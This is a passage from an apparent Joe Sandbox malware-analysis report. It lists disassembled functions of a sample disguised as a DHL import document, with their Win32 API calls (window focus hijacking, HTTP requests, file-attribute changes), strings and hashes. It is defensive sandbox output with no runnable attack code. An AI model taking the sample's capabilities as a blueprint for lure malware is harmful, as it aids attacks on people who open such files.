                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00863B62
                                                                                          • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00863BAC
                                                                                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00863BC7
                                                                                          • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00863BE2
                                                                                          • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00863BF6
                                                                                          • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00863C13
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$LongWindow
                                                                                          • String ID:
                                                                                          • API String ID: 312131281-0
                                                                                          • Opcode ID: c59a214f965e6eb3b455eadcf739ebc60044a91f6f00aa9ecbc8637647108561
                                                                                          • Instruction ID: e45152fc0b7719976389e8a4eecb90c29dda43839306d88e3fccdc5d70103545
                                                                                          • Opcode Fuzzy Hash: c59a214f965e6eb3b455eadcf739ebc60044a91f6f00aa9ecbc8637647108561
                                                                                          • Instruction Fuzzy Hash: FC617775A00208AFDB11DFA8CC85EEEB7B8FF09714F14019AFA15E72A1C774AA41DB50
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0083B151
                                                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0083A1E1,?,00000001), ref: 0083B165
                                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 0083B16C
                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0083A1E1,?,00000001), ref: 0083B17B
                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0083B18D
                                                                                          • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0083A1E1,?,00000001), ref: 0083B1A6
                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0083A1E1,?,00000001), ref: 0083B1B8
                                                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0083A1E1,?,00000001), ref: 0083B1FD
                                                                                          • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0083A1E1,?,00000001), ref: 0083B212
                                                                                          • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0083A1E1,?,00000001), ref: 0083B21D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                          • String ID:
                                                                                          • API String ID: 2156557900-0
                                                                                          • Opcode ID: da8df6e32dd116b085f5b8236f618cd3d2681fb4193a32926f6f01ae1dbd554b
                                                                                          • Instruction ID: ab6a9fd5095eebcf10184cc4fbebd952508abdfc1800ebfe621b6dff2f691d3c
                                                                                          • Opcode Fuzzy Hash: da8df6e32dd116b085f5b8236f618cd3d2681fb4193a32926f6f01ae1dbd554b
                                                                                          • Instruction Fuzzy Hash: 0E318DB5500604BFEB109F64DC49F7EBBA9FBA2311F114519FB06D6190D7B89E408FA4
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 00802C94
                                                                                            • Part of subcall function 008029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000), ref: 008029DE
                                                                                            • Part of subcall function 008029C8: GetLastError.KERNEL32(00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000,00000000), ref: 008029F0
                                                                                          • _free.LIBCMT ref: 00802CA0
                                                                                          • _free.LIBCMT ref: 00802CAB
                                                                                          • _free.LIBCMT ref: 00802CB6
                                                                                          • _free.LIBCMT ref: 00802CC1
                                                                                          • _free.LIBCMT ref: 00802CCC
                                                                                          • _free.LIBCMT ref: 00802CD7
                                                                                          • _free.LIBCMT ref: 00802CE2
                                                                                          • _free.LIBCMT ref: 00802CED
                                                                                          • _free.LIBCMT ref: 00802CFB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: adf0a53b42fecd63d393f147c6ec444dc4f96913b27caae5619afd5b0f42338a
                                                                                          • Instruction ID: 66984fd28c4664983938e33572e93f0776de820ac3546b7486bfa6c02ad33a76
                                                                                          • Opcode Fuzzy Hash: adf0a53b42fecd63d393f147c6ec444dc4f96913b27caae5619afd5b0f42338a
                                                                                          • Instruction Fuzzy Hash: 7211A776100108AFCB42EF58DC46DDD3FA9FF05350F5144A5FA489F262D671EE509B91
                                                                                          APIs
                                                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 007D1459
                                                                                          • OleUninitialize.OLE32(?,00000000), ref: 007D14F8
                                                                                          • UnregisterHotKey.USER32(?), ref: 007D16DD
                                                                                          • DestroyWindow.USER32(?), ref: 008124B9
                                                                                          • FreeLibrary.KERNEL32(?), ref: 0081251E
                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0081254B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                          • String ID: close all
                                                                                          • API String ID: 469580280-3243417748
                                                                                          • Opcode ID: d098a06f21a0756cf84715e4039835f7fa1bd49f77ab7db8d1a1ebcaa7506bcd
                                                                                          • Instruction ID: f52b2c8fc4bebbeabd160f72dedf6e817803802ab14116889006790b9f23ae66
                                                                                          • Opcode Fuzzy Hash: d098a06f21a0756cf84715e4039835f7fa1bd49f77ab7db8d1a1ebcaa7506bcd
                                                                                          • Instruction Fuzzy Hash: 76D15531702212DFCB19EF15C899AA9F7A5FF04710F5541AEE44AAB362CB34AC62CF50
                                                                                          APIs
                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00847FAD
                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00847FC1
                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00847FEB
                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00848005
                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00848017
                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00848060
                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 008480B0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectory$AttributesFile
                                                                                          • String ID: *.*
                                                                                          • API String ID: 769691225-438819550
                                                                                          • Opcode ID: 821027af9299ffc462d7674c0ccf5a9703f9efd9fa43fd56a4fcb473a610efd8
                                                                                          • Instruction ID: 406c1af13cc95ccc1d0e32dff101df67c0f5b49b9370128f4e4d3f11aec41960
                                                                                          • Opcode Fuzzy Hash: 821027af9299ffc462d7674c0ccf5a9703f9efd9fa43fd56a4fcb473a610efd8
                                                                                          • Instruction Fuzzy Hash: 47819E72508249DBCB24EF14C844AAEB3E8FF88714F14496AF885C7250EB39DD49CB92
                                                                                          APIs
                                                                                          • SetWindowLongW.USER32(?,000000EB), ref: 007D5C7A
                                                                                            • Part of subcall function 007D5D0A: GetClientRect.USER32(?,?), ref: 007D5D30
                                                                                            • Part of subcall function 007D5D0A: GetWindowRect.USER32(?,?), ref: 007D5D71
                                                                                            • Part of subcall function 007D5D0A: ScreenToClient.USER32(?,?), ref: 007D5D99
                                                                                          • GetDC.USER32 ref: 008146F5
                                                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00814708
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00814716
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0081472B
                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00814733
                                                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 008147C4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                          • String ID: U
                                                                                          • API String ID: 4009187628-3372436214
                                                                                          • Opcode ID: c965a63ec1dedb79af1f309a066553d47bfc6efb6f9bc0f62868e6ba442828e0
                                                                                          • Instruction ID: ed44debfab4624ec5da15e16a07d821f1bf9f66ccdc908364f260c779337a6bb
                                                                                          • Opcode Fuzzy Hash: c965a63ec1dedb79af1f309a066553d47bfc6efb6f9bc0f62868e6ba442828e0
                                                                                          • Instruction Fuzzy Hash: 1C712430500209DFDF218F64C984AFA3BB9FF4A325F14166AED55DA2A6C7348C81DF60
                                                                                          APIs
                                                                                          • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 008435E4
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                          • LoadStringW.USER32(008A2390,?,00000FFF,?), ref: 0084360A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: LoadString$_wcslen
                                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                          • API String ID: 4099089115-2391861430
                                                                                          • Opcode ID: 4e1b28de254d09923b55caa5116511f97e995b2522cb6bc79ddbfaaddcfd132c
                                                                                          • Instruction ID: b0d9c84f7356dab1d386e83d296c4b7abe017396d676b576dae1d4258c29caca
                                                                                          • Opcode Fuzzy Hash: 4e1b28de254d09923b55caa5116511f97e995b2522cb6bc79ddbfaaddcfd132c
                                                                                          • Instruction Fuzzy Hash: CC516E71900219FADF14EBA0DC46EEEBB78FF14340F144126F115B22A1EB791A98DBA1
                                                                                          APIs
                                                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0084C272
                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0084C29A
                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0084C2CA
                                                                                          • GetLastError.KERNEL32 ref: 0084C322
                                                                                          • SetEvent.KERNEL32(?), ref: 0084C336
                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0084C341
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                          • String ID:
                                                                                          • API String ID: 3113390036-3916222277
                                                                                          • Opcode ID: 0621b2468864e4ae664507b7ade2128c2d89725ff33de89b8ed3fee982860f24
                                                                                          • Instruction ID: f6bfe9dc8430199a650e328e19f36b84f0a4957e989cab9524f3fcaeb30c83f7
                                                                                          • Opcode Fuzzy Hash: 0621b2468864e4ae664507b7ade2128c2d89725ff33de89b8ed3fee982860f24
                                                                                          • Instruction Fuzzy Hash: 03316BB160160CAFD7619FA98888ABB7AFCFB49744B14851EF486D2210DBB4DD049B61
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00813AAF,?,?,Bad directive syntax error,0086CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 008398BC
                                                                                          • LoadStringW.USER32(00000000,?,00813AAF,?), ref: 008398C3
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00839987
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleLoadMessageModuleString_wcslen
                                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                          • API String ID: 858772685-4153970271
                                                                                          • Opcode ID: 0435bdd2e562c6a85c1c6d67627df4e16e36a2d684438cefc19cd82608d2e3e5
                                                                                          • Instruction ID: 73ff58a6c0b6ed6278f01be205cd327da3739f97f589c8413ea14fdf9ccae2a9
                                                                                          • Opcode Fuzzy Hash: 0435bdd2e562c6a85c1c6d67627df4e16e36a2d684438cefc19cd82608d2e3e5
                                                                                          • Instruction Fuzzy Hash: 0521943190021EEBDF11AF90CC0AEEE7779FF18704F044456F519A51A1EB799628DB51
                                                                                          APIs
                                                                                          • GetParent.USER32 ref: 008320AB
                                                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 008320C0
                                                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0083214D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClassMessageNameParentSend
                                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                          • API String ID: 1290815626-3381328864
                                                                                          • Opcode ID: aad39cdda1894d3db0c3ecf14bc7ce96a8fd941f39e03b8354cda15b5658b01a
                                                                                          • Instruction ID: df9e6d32b60dc5e02295705b3996f83b9d58ffc66df2799da4e551cd88f3e8ca
                                                                                          • Opcode Fuzzy Hash: aad39cdda1894d3db0c3ecf14bc7ce96a8fd941f39e03b8354cda15b5658b01a
                                                                                          • Instruction Fuzzy Hash: AD110A7668870AFAFA017224DC0ADBB379CFB54724F204156F704F51D1FBA978015654
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4675fee76bb8fae953eacf3ad33a0c6640f561a32047cac8c4c72987e42759b7
                                                                                          • Instruction ID: 1f2837fa008e8cce2bd2b385b8a3db377d692e08726e09e78b10c9c1ac43c489
                                                                                          • Opcode Fuzzy Hash: 4675fee76bb8fae953eacf3ad33a0c6640f561a32047cac8c4c72987e42759b7
                                                                                          • Instruction Fuzzy Hash: E7C1DEB4A04249EFDB619FA8CC45BADBBB0FF0A310F144199E994E73D2CB749941CB61
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                          • String ID:
                                                                                          • API String ID: 1282221369-0
                                                                                          • Opcode ID: 606535a05bec1f74749712f90384796c7bf8132bbef1fb2298d6166acc6bf209
                                                                                          • Instruction ID: fecc9e057db9d6615eb0dfb8ac7ed389a1e26730fe83f2086b3e2e7833990468
                                                                                          • Opcode Fuzzy Hash: 606535a05bec1f74749712f90384796c7bf8132bbef1fb2298d6166acc6bf209
                                                                                          • Instruction Fuzzy Hash: 9D614772A04306AFDBA1AFB89C85A6D7BA5FF02320F14426DF944D72C2DBB19D018752
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00865186
                                                                                          • ShowWindow.USER32(?,00000000), ref: 008651C7
                                                                                          • ShowWindow.USER32(?,00000005,?,00000000), ref: 008651CD
                                                                                          • SetFocus.USER32(?,?,00000005,?,00000000), ref: 008651D1
                                                                                            • Part of subcall function 00866FBA: DeleteObject.GDI32(00000000), ref: 00866FE6
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0086520D
                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0086521A
                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0086524D
                                                                                          • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00865287
                                                                                          • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00865296
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                          • String ID:
                                                                                          • API String ID: 3210457359-0
                                                                                          • Opcode ID: b84119a3740f7061eaee722b9a0db63b8e54a0e83b76f548cf60a5e035781e99
                                                                                          • Instruction ID: de67ea6c467a762176bc60236d94cfb9140d50f577db4f4caa352938cbc13e79
                                                                                          • Opcode Fuzzy Hash: b84119a3740f7061eaee722b9a0db63b8e54a0e83b76f548cf60a5e035781e99
                                                                                          • Instruction Fuzzy Hash: 6A51C170A41A08FFEF219F28CC5ABD93B65FB06325F164012F625D63E0C7B5A990DB51
                                                                                          APIs
                                                                                          • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00826890
                                                                                          • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 008268A9
                                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 008268B9
                                                                                          • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 008268D1
                                                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 008268F2
                                                                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,007E8874,00000000,00000000,00000000,000000FF,00000000), ref: 00826901
                                                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0082691E
                                                                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,007E8874,00000000,00000000,00000000,000000FF,00000000), ref: 0082692D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                          • String ID:
                                                                                          • API String ID: 1268354404-0
                                                                                          • Opcode ID: e6a316dff5ec72858c45d7a823889459c962b978412d91c034a0e367a26ff2a4
                                                                                          • Instruction ID: eb2ea188d294101999f445abadce5a54f153c38417463cda79c661a066913d03
                                                                                          • Opcode Fuzzy Hash: e6a316dff5ec72858c45d7a823889459c962b978412d91c034a0e367a26ff2a4
                                                                                          • Instruction Fuzzy Hash: FF519AB0600249EFDB20CF29DC55FAA7BB5FB48350F104528F956D72A0EBB4E990DB40
                                                                                          APIs
                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0084C182
                                                                                          • GetLastError.KERNEL32 ref: 0084C195
                                                                                          • SetEvent.KERNEL32(?), ref: 0084C1A9
                                                                                            • Part of subcall function 0084C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0084C272
                                                                                            • Part of subcall function 0084C253: GetLastError.KERNEL32 ref: 0084C322
                                                                                            • Part of subcall function 0084C253: SetEvent.KERNEL32(?), ref: 0084C336
                                                                                            • Part of subcall function 0084C253: InternetCloseHandle.WININET(00000000), ref: 0084C341
